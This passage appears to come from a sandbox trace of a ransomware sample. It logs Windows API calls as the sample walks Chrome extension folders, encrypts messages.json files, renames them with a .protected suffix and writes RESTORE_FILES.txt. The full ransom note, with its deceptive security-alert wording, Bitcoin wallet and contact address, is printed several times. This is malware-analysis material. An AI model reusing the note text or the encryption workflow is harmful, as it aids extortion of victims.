(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.076] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.076] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.076] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.076] CloseHandle (hObject=0x164) returned 1 [0079.076] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0079.076] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned 141 [0079.077] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0079.077] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*") returned 143 [0079.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.077] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.077] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.077] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.077] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\.") returned 143 [0079.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.077] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.077] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.077] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.077] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.077] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.077] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\..") returned 144 [0079.077] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.077] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.077] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.077] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.077] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.077] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.077] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.078] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.078] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.078] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.078] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.079] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.079] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.079] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.080] CloseHandle (hObject=0x168) returned 1 [0079.080] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.protected") returned 165 [0079.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.protected")) returned 1 [0079.080] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.080] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.080] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0079.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.080] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.081] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.081] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.081] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.081] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.081] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.081] CloseHandle (hObject=0x164) returned 1 [0079.081] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0079.082] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl") returned 141 [0079.082] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0079.082] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0079.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*") returned 143 [0079.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.082] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.082] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.082] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.082] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\.") returned 143 [0079.082] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.082] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.082] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.082] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.082] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\..") returned 144 [0079.082] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.082] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.082] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.083] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.083] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.083] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.083] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.083] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.083] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.083] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.084] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.084] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.084] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.084] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.084] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.084] CloseHandle (hObject=0x168) returned 1 [0079.084] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.protected") returned 165 [0079.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.protected")) returned 1 [0079.085] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.085] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.085] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0079.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.086] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.086] lstrlenA 